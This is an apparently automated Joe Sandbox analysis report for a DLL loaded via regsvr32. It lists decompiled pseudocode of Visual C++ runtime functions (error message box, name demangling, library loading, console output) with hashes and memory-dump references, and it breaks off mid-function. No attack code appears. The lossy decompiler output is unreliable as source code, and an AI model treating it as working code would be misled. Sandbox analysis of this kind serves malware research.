                                                                      • API ID: Window$PaintProc$BeginConfigDestroyGestureMessagePostQuit
                                                                      • String ID:
                                                                      • API String ID: 385970368-0
                                                                      • Opcode ID: ca5ed71823d11ef4f3d1dc7fc2a5d8307f9eae50ba4c8897941898ca097222c5
                                                                      • Instruction ID: 2485c98077308c58af756f6f459887cb3efff09b4bce0348d768abbe77ca4fe2
                                                                      • Opcode Fuzzy Hash: ca5ed71823d11ef4f3d1dc7fc2a5d8307f9eae50ba4c8897941898ca097222c5
                                                                      • Instruction Fuzzy Hash: DD510332118789C6E6A1DF59E4543AEB7A1F3897C0F108116F68A47BA8DF7CC649DF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 80%
                                                                      			E00000001180056B70(void* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r9, long long _a8, long long _a16, long long _a24) {
                                                                      				void* _t15;
                                                                      				void* _t26;
                                                                      				void* _t46;
                                                                      				void* _t65;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      
                                                                      				_t80 = __r9;
                                                                      				_t67 = __rsi;
                                                                      				_a8 = __rbx;
                                                                      				_a16 = __rbp;
                                                                      				_a24 = __rsi;
                                                                      				_t46 = __rcx;
                                                                      				_t15 = E0000000118005B6F0(3, _t26, __rax);
                                                                      				if (_t15 == 1) goto 0x80056c97;
                                                                      				if (_t15 != 0) goto 0x80056bb1;
                                                                      				if ( *0x80074258 == 1) goto 0x80056c97;
                                                                      				r14d = 0x314;
                                                                      				if (E0000000118004492C(r14d, __rax, 0x80074260, __rdx, L"Runtime Error!\n\nProgram: ") != 0) goto 0x80056cb8;
                                                                      				 *0x8007449a = 0;
                                                                      				r8d = 0x104;
                                                                      				if (GetModuleFileNameW(??, ??, ??) != 0) goto 0x80056c18;
                                                                      				_t28 = _t82 - 0x19;
                                                                      				if (E0000000118004492C(_t82 - 0x19, __rax, 0x80074292, 0x80074292, L"<program name unknown>") != 0) goto 0x80056cb8;
                                                                      				if ( *0x48015C7B6 != 0) goto 0x80056c1c;
                                                                      				if (0x180074293 - 0x3c <= 0) goto 0x80056c58;
                                                                      				r9d = 3;
                                                                      				if (E0000000118004FD50(_t82 - 0x19, 0xffffffffffffffc5, __rcx, 0x18007421c, _t65 - 0xffffffffffffffc5, __rsi, L"...", __r9) != 0) goto 0x80056cb8;
                                                                      				if (E0000000118004FA3C(_t82 - 0x19, 0xffffffffffffffc5, 0x80074260, _t82, L"\n\n") != 0) goto 0x80056cb8;
                                                                      				_t79 = __rcx;
                                                                      				if (E0000000118004FA3C(_t28, 0xffffffffffffffc5, 0x80074260, _t82, __rcx) != 0) goto 0x80056cb8;
                                                                      				r8d = 0x12010;
                                                                      				E0000000118005B7D4(0, 0xffffffffffffffc5, __rcx, 0x80074260, L"Microsoft Visual C++ Runtime Library", _t67, 0x80074260, __rcx, _t80, _t81);
                                                                      				goto 0x80056c9f;
                                                                      				return E00000001180056D00(_t28, _t46, _t79);
                                                                      			}









                                                                      0x180056b70
                                                                      0x180056b70
                                                                      0x180056b70
                                                                      0x180056b75
                                                                      0x180056b7a
                                                                      0x180056b88
                                                                      0x180056b90
                                                                      0x180056b98
                                                                      0x180056ba2
                                                                      0x180056bab
                                                                      0x180056bb1
                                                                      0x180056bd2
                                                                      0x180056bdf
                                                                      0x180056be9
                                                                      0x180056bfd
                                                                      0x180056c06
                                                                      0x180056c12
                                                                      0x180056c24
                                                                      0x180056c2e
                                                                      0x180056c34
                                                                      0x180056c56
                                                                      0x180056c6c
                                                                      0x180056c6e
                                                                      0x180056c7e
                                                                      0x180056c80
                                                                      0x180056c90
                                                                      0x180056c95
                                                                      0x180056cb7

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: FileModuleName_set_error_mode
                                                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                      • API String ID: 3581924421-4022980321
                                                                      • Opcode ID: 87917aadb77387742c736d9cea41f933cd8e071e8c74b7fabd8c6a4704649a26
                                                                      • Instruction ID: b9eb75ef7c7ed04a396941589b81e37a80dd368cd71cef599c2a8eddf8ae82c2
                                                                      • Opcode Fuzzy Hash: 87917aadb77387742c736d9cea41f933cd8e071e8c74b7fabd8c6a4704649a26
                                                                      • Instruction Fuzzy Hash: 6331EF3270164894FAE2DB62A8013EA6795F74DBC4F808512FD5967BB6DF3AC70AC300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 64%
                                                                      			E00000001180035254(long long __rbx, long long* __rcx, long long __rdx, long long _a8) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				char _v40;
                                                                      				intOrPtr _v48;
                                                                      				void* _v56;
                                                                      				void* __rbp;
                                                                      				unsigned int _t28;
                                                                      				unsigned int _t33;
                                                                      				void* _t37;
                                                                      				intOrPtr _t38;
                                                                      				char* _t49;
                                                                      				char* _t50;
                                                                      				intOrPtr* _t53;
                                                                      				long long _t55;
                                                                      				long long* _t63;
                                                                      				long long _t69;
                                                                      				void* _t73;
                                                                      				void* _t75;
                                                                      				void* _t78;
                                                                      
                                                                      				_t69 = __rdx;
                                                                      				_a8 = __rbx;
                                                                      				_t49 =  *0x800738a8; // 0x0
                                                                      				_t63 = __rcx;
                                                                      				if ( *_t49 == 0x58) goto 0x80035374;
                                                                      				if ( *_t49 == 0x5a) goto 0x80035337;
                                                                      				E000000011800353B0(_t37, __rcx,  &_v56, __rdx, _t73, _t75, _t78);
                                                                      				_t38 = _v48;
                                                                      				if (_t38 != 0) goto 0x8003532b;
                                                                      				_t50 =  *0x800738a8; // 0x0
                                                                      				if ( *_t50 == 0) goto 0x8003532b;
                                                                      				if ( *_t50 == 0x40) goto 0x80035321;
                                                                      				if ( *_t50 == 0x5a) goto 0x800352bb;
                                                                      				 *((intOrPtr*)(_t63 + 8)) = 0;
                                                                      				 *((char*)(_t63 + 8)) = 2;
                                                                      				 *_t63 = _t69;
                                                                      				goto 0x800353a2;
                                                                      				 *0x800738a8 = _t50 + 1;
                                                                      				_t28 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t28 >> 0x12) & 0x00000001) == 0) goto 0x800352e8;
                                                                      				_v32 = 4;
                                                                      				goto 0x800352f6;
                                                                      				_t53 = ",<ellipsis>";
                                                                      				_v32 = 0xb;
                                                                      				_v40 = _t53;
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E960( &_v56,  &_v24,  &_v40);
                                                                      				 *_t63 =  *_t53;
                                                                      				 *((intOrPtr*)(_t63 + 8)) =  *((intOrPtr*)(_t53 + 8));
                                                                      				goto 0x800353a2;
                                                                      				 *0x800738a8 = _t53 + 1;
                                                                      				_t55 = _v56;
                                                                      				 *_t63 = _t55;
                                                                      				 *((intOrPtr*)(_t63 + 8)) = _t38;
                                                                      				goto 0x800353a2;
                                                                      				 *0x800738a8 = _t55 + 1;
                                                                      				_t33 =  *0x800738b8; // 0x0
                                                                      				if (( !(_t33 >> 0x12) & 0x00000001) == 0) goto 0x80035364;
                                                                      				_v32 = 3;
                                                                      				goto 0x80035390;
                                                                      				_v32 = 0xa;
                                                                      				goto 0x80035390;
                                                                      				_v32 = 4;
                                                                      				 *0x800738a8 = "<ellipsis>" + 1;
                                                                      				_v40 = "void";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				return E0000000118002E4E4( *_t53,  &_v40);
                                                                      			}






















                                                                      0x180035254
                                                                      0x180035254
                                                                      0x180035261
                                                                      0x180035268
                                                                      0x18003526e
                                                                      0x180035277
                                                                      0x180035281
                                                                      0x180035286
                                                                      0x18003528d
                                                                      0x180035293
                                                                      0x18003529c
                                                                      0x1800352a5
                                                                      0x1800352aa
                                                                      0x1800352ac
                                                                      0x1800352af
                                                                      0x1800352b3
                                                                      0x1800352b6
                                                                      0x1800352c2
                                                                      0x1800352c9
                                                                      0x1800352d6
                                                                      0x1800352df
                                                                      0x1800352e6
                                                                      0x1800352e8
                                                                      0x1800352ef
                                                                      0x1800352f6
                                                                      0x1800352fe
                                                                      0x180035306
                                                                      0x18003530b
                                                                      0x180035313
                                                                      0x180035319
                                                                      0x18003531c
                                                                      0x180035324
                                                                      0x18003532b
                                                                      0x18003532f
                                                                      0x180035332
                                                                      0x180035335
                                                                      0x18003533e
                                                                      0x180035345
                                                                      0x180035352
                                                                      0x18003535b
                                                                      0x180035362
                                                                      0x18003536b
                                                                      0x180035372
                                                                      0x180035377
                                                                      0x18003537e
                                                                      0x180035390
                                                                      0x180035394
                                                                      0x180035398
                                                                      0x1800353af

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+Replicator::operator[]
                                                                      • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                      • API String ID: 1405650943-2211150622
                                                                      • Opcode ID: 46227c30e51716b5dbef8dafd3d8fa6bb422a18db096cccfb7fd7f9e094c63da
                                                                      • Instruction ID: 6ef9cf9ae27716c1b1dd6131d8945ead8597147e4b632f146d7d9c0c00eef142
                                                                      • Opcode Fuzzy Hash: 46227c30e51716b5dbef8dafd3d8fa6bb422a18db096cccfb7fd7f9e094c63da
                                                                      • Instruction Fuzzy Hash: 13412872A04B4898FB938F68D8813DE3BE4B30C788F54C116EA8956764DF798789C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 69%
                                                                      			E00000001180032E58(long long __rbx, long long __rcx, long long _a8) {
                                                                      				char _v24;
                                                                      				intOrPtr _v32;
                                                                      				void* _v40;
                                                                      				intOrPtr _v48;
                                                                      				long long _v56;
                                                                      				intOrPtr _t30;
                                                                      				intOrPtr _t32;
                                                                      				char _t41;
                                                                      				char* _t46;
                                                                      				intOrPtr* _t47;
                                                                      				long long* _t54;
                                                                      				char* _t57;
                                                                      				void* _t66;
                                                                      				void* _t67;
                                                                      
                                                                      				_a8 = __rbx;
                                                                      				_t46 =  *0x800738a8; // 0x0
                                                                      				_t54 = __rcx;
                                                                      				_v56 = __rcx;
                                                                      				_v48 = 0;
                                                                      				_t41 =  *_t46;
                                                                      				if (_t41 == 0) goto 0x80032f6d;
                                                                      				if (_t41 == 0) goto 0x80032ee1;
                                                                      				if (_t41 == 0) goto 0x80032ee1;
                                                                      				if (_t41 == 0) goto 0x80032ed2;
                                                                      				if (_t41 == 0) goto 0x80032ed2;
                                                                      				if (_t41 == 0) goto 0x80032ef7;
                                                                      				if (_t41 == 0) goto 0x80032ec3;
                                                                      				if (_t41 == 0) goto 0x80032eba;
                                                                      				if ( *_t46 - 0x2a == 1) goto 0x80032eba;
                                                                      				 *((intOrPtr*)(__rcx + 8)) = 0;
                                                                      				 *((char*)(__rcx + 8)) = 2;
                                                                      				 *((long long*)(__rcx)) = __rcx;
                                                                      				goto 0x80032f7a;
                                                                      				goto 0x80032ee8;
                                                                      				r8d = 4;
                                                                      				goto 0x80032eee;
                                                                      				r8d = 6;
                                                                      				goto 0x80032eee;
                                                                      				r8d = 5;
                                                                      				_t57 =  &_v56;
                                                                      				E0000000118003668C(0, _t46, __rcx, _t57, "char ", _t66, _t67);
                                                                      				_t47 =  *0x800738a8; // 0x0
                                                                      				_t32 =  *_t47;
                                                                      				 *0x800738a8 =  *0x800738a8 + 1;
                                                                      				if ((_t57 - 0x00000031 & 0x000000f9) != 0) goto 0x80032f13;
                                                                      				if (_t32 != 0x37) goto 0x80032f18;
                                                                      				if (_t32 != 0x37) goto 0x80032f5e;
                                                                      				_v32 = 9;
                                                                      				_v40 = "unsigned ";
                                                                      				asm("movaps xmm0, [ebp-0x20]");
                                                                      				asm("movdqa [ebp-0x20], xmm0");
                                                                      				E0000000118002E4E4( &_v24,  &_v40);
                                                                      				E0000000118002E98C("unsigned ",  &_v40,  &_v56);
                                                                      				_v56 = _v40;
                                                                      				_v48 = _v32;
                                                                      				 *_t54 = _v56;
                                                                      				_t30 = _v48;
                                                                      				 *((intOrPtr*)(_t54 + 8)) = _t30;
                                                                      				goto 0x80032f7a;
                                                                      				 *((intOrPtr*)(_t54 + 8)) = 0;
                                                                      				 *_t54 = 0x8005fee0;
                                                                      				return _t30;
                                                                      			}

















                                                                      0x180032e58
                                                                      0x180032e65
                                                                      0x180032e6c
                                                                      0x180032e71
                                                                      0x180032e75
                                                                      0x180032e78
                                                                      0x180032e7a
                                                                      0x180032e86
                                                                      0x180032e8b
                                                                      0x180032e90
                                                                      0x180032e95
                                                                      0x180032e9a
                                                                      0x180032e9f
                                                                      0x180032ea4
                                                                      0x180032ea9
                                                                      0x180032eab
                                                                      0x180032eae
                                                                      0x180032eb2
                                                                      0x180032eb5
                                                                      0x180032ec1
                                                                      0x180032ec3
                                                                      0x180032ed0
                                                                      0x180032ed2
                                                                      0x180032edf
                                                                      0x180032ee8
                                                                      0x180032eee
                                                                      0x180032ef2
                                                                      0x180032ef7
                                                                      0x180032efe
                                                                      0x180032f00
                                                                      0x180032f0c
                                                                      0x180032f11
                                                                      0x180032f16
                                                                      0x180032f18
                                                                      0x180032f26
                                                                      0x180032f2e
                                                                      0x180032f36
                                                                      0x180032f3b
                                                                      0x180032f4b
                                                                      0x180032f54
                                                                      0x180032f5b
                                                                      0x180032f62
                                                                      0x180032f65
                                                                      0x180032f68
                                                                      0x180032f6b
                                                                      0x180032f74
                                                                      0x180032f77
                                                                      0x180032f87

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Name::operator+
                                                                      • String ID: char $int $long $short $unsigned
                                                                      • API String ID: 2943138195-3894466517
                                                                      • Opcode ID: 0dd3d6472079f14a98eacbda09c25bf5c1475a9a3f4a1e476275cb2f0fa6926b
                                                                      • Instruction ID: e0638b2fd20cacb5260b5228158f0ce824970ae2ae5513d459a2dc4a6d4602de
                                                                      • Opcode Fuzzy Hash: 0dd3d6472079f14a98eacbda09c25bf5c1475a9a3f4a1e476275cb2f0fa6926b
                                                                      • Instruction Fuzzy Hash: 13413872A14B589CFB938F68E8413ED3BB1B30D788F55C126FA0856B69DF398648C750
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: MZx$api-ms-
                                                                      • API String ID: 3813093105-259127448
                                                                      • Opcode ID: 7330e9eef841fc510343b64c36579c5454bf85420f7fb775ab7f857efb251f72
                                                                      • Instruction ID: 738862c50276d429f0a30864db8940da8d0a3577c9ec99a741cf0b0f36384433
                                                                      • Opcode Fuzzy Hash: 7330e9eef841fc510343b64c36579c5454bf85420f7fb775ab7f857efb251f72
                                                                      • Instruction Fuzzy Hash: 4721B531702F0480EE96DB56A4503942395AB4CBF4F5AC320AE39577E1FF38C6598706
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: 71ab66db6de1574abc79fd805a271c9b9d2aa753233f64d6ff45419bb9c68d90
                                                                      • Instruction ID: a6124cfbb1f9d94821f08346d588af156bf3628cae2647783231893224671d73
                                                                      • Opcode Fuzzy Hash: 71ab66db6de1574abc79fd805a271c9b9d2aa753233f64d6ff45419bb9c68d90
                                                                      • Instruction Fuzzy Hash: 0A216D3430434C42FADBA3215A563EBA3925F8C7F0F66C724B97647AD6DE29C7885710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Library$Load$ErrorFreeLast
                                                                      • String ID: MZx$api-ms-
                                                                      • API String ID: 3813093105-259127448
                                                                      • Opcode ID: 77d69a74f4433b546e3cbd70d2ba822202a01995579e7cc221bd403fcf397a4e
                                                                      • Instruction ID: 54b69e483526f52714c5a260f2c8f64c758f0fb545591b5f4508e056e3a91696
                                                                      • Opcode Fuzzy Hash: 77d69a74f4433b546e3cbd70d2ba822202a01995579e7cc221bd403fcf397a4e
                                                                      • Instruction Fuzzy Hash: B721C531711F5880EA96EB1698403987395EB4DFE8F598325EE39877E0EF78DA49C304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: Value$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2506987500-0
                                                                      • Opcode ID: c967084e187cc8c2ee05272d5d411addc4539b02ad98c0d3025031373203dd2e
                                                                      • Instruction ID: 830f37fdb8bd8126027ec62d1fbc1074ea31460804455aa9306784ebdaa0ea32
                                                                      • Opcode Fuzzy Hash: c967084e187cc8c2ee05272d5d411addc4539b02ad98c0d3025031373203dd2e
                                                                      • Instruction Fuzzy Hash: 6611213030124842FAD7A37199993EBA3826B8C7F0F42C724B93647BD2CE2887888710
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 20ee7cb7fbcc800d94c080b0e8d97768ad927eff389874882cf78835b365a8a3
                                                                      • Instruction ID: 06e39d7d5237abd2ae6e18f5db46ef8744ce732f481d6729ef77d0302c18431f
                                                                      • Opcode Fuzzy Hash: 20ee7cb7fbcc800d94c080b0e8d97768ad927eff389874882cf78835b365a8a3
                                                                      • Instruction Fuzzy Hash: 5D119031310B4486E7918B46E85439973A1F38CFE4F148224FA2EC7BA4DF78C6888700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000002.00000002.452552735.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                      • Associated: 00000002.00000002.452549253.0000000180000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452605748.000000018005E000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452617453.0000000180072000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452622348.0000000180075000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452628789.000000018007C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      • Associated: 00000002.00000002.452637032.0000000180088000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_2_2_180000000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                      • String ID: CONOUT$
                                                                      • API String ID: 3230265001-3130406586
                                                                      • Opcode ID: 2d46a7985f7fee32a30fac2babb42f4da8d4445ccf50454ab3f297a8137c561f
                                                                      • Instruction ID: fb6dd3d0ad527687879a9228816b68d1a8c6a8ca56866b5ed892e90a34eb9c5c
                                                                      • Opcode Fuzzy Hash: 2d46a7985f7fee32a30fac2babb42f4da8d4445ccf50454ab3f297a8137c561f
                                                                      • Instruction Fuzzy Hash: 53117372210B4883E7A18F55E85479973A1F38CBE9F148215FA6A87BA4DF3DC688C714
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 54%
                                                                      			E000000011800488B0(void* __ecx, signed int __edx, void* __esi, void* __ebp, long long __rbx, intOrPtr* __rcx, long long __r8) {
                                                                      				void* __rdi;
                                                                      				void* __rsi;
                                                                      				void* __rbp;
                                                                      				intOrPtr _t182;
                                                                      				signed int _t186;
                                                                      				signed int _t193;
                                                                      				signed int _t198;
                                                                      				void* _t212;
                                                                      				signed char _t213;
                                                                      				void* _t262;
                                                                      				signed long long _t263;
                                                                      				signed long long _t266;
                                                                      				long long _t268;
                                                                      				signed long long _t270;
                                                                      				long long _t275;
                                                                      				long long _t277;
                                                                      				long long _t279;
                                                                      				intOrPtr* _t288;
                                                                      				intOrPtr _t293;
                                                                      				long long _t294;
                                                                      				long long _t317;
                                                                      				void* _t325;
                                                                      				long long _t326;
                                                                      				void* _t327;
                                                                      				long long _t328;
                                                                      				intOrPtr* _t329;
                                                                      				long long _t330;
                                                                      				signed char* _t331;
                                                                      				signed char* _t332;
                                                                      				signed char* _t333;
                                                                      				intOrPtr* _t334;
                                                                      				void* _t335;
                                                                      				void* _t336;
                                                                      				signed long long _t337;
                                                                      				intOrPtr _t340;
                                                                      				signed long long _t342;
                                                                      				void* _t344;
                                                                      				intOrPtr* _t346;
                                                                      				intOrPtr _t350;
                                                                      				signed long long _t355;
                                                                      				signed long long _t358;
                                                                      				signed long long _t360;
                                                                      				void* _t363;
                                                                      				long long _t364;
                                                                      				long long _t366;
                                                                      				char _t367;
                                                                      				void* _t371;
                                                                      				signed char* _t372;
                                                                      				signed long long _t374;
                                                                      
                                                                      				_t262 = _t336;
                                                                      				_t335 = _t262 - 0x57;
                                                                      				_t337 = _t336 - 0xe0;
                                                                      				 *((long long*)(_t335 - 9)) = 0xfffffffe;
                                                                      				 *((long long*)(_t262 + 8)) = __rbx;
                                                                      				_t263 =  *0x80072078; // 0xc949cbcab002
                                                                      				 *(_t335 + 0x17) = _t263 ^ _t337;
                                                                      				_t329 = __r8;
                                                                      				 *((long long*)(_t335 - 0x49)) = __r8;
                                                                      				_t288 = __rcx;
                                                                      				_t366 =  *((intOrPtr*)(_t335 + 0x7f));
                                                                      				 *((long long*)(_t335 - 0x51)) = _t366;
                                                                      				 *(_t335 - 0x19) = __edx;
                                                                      				_t266 = __edx >> 6;
                                                                      				 *(_t335 - 0x59) = _t266;
                                                                      				 *(_t335 - 0x11) = __edx;
                                                                      				_t374 = __edx + __edx * 8;
                                                                      				_t268 =  *((intOrPtr*)( *((intOrPtr*)(0x180000000 + 0x73d10 + _t266 * 8)) + 0x28 + _t374 * 8));
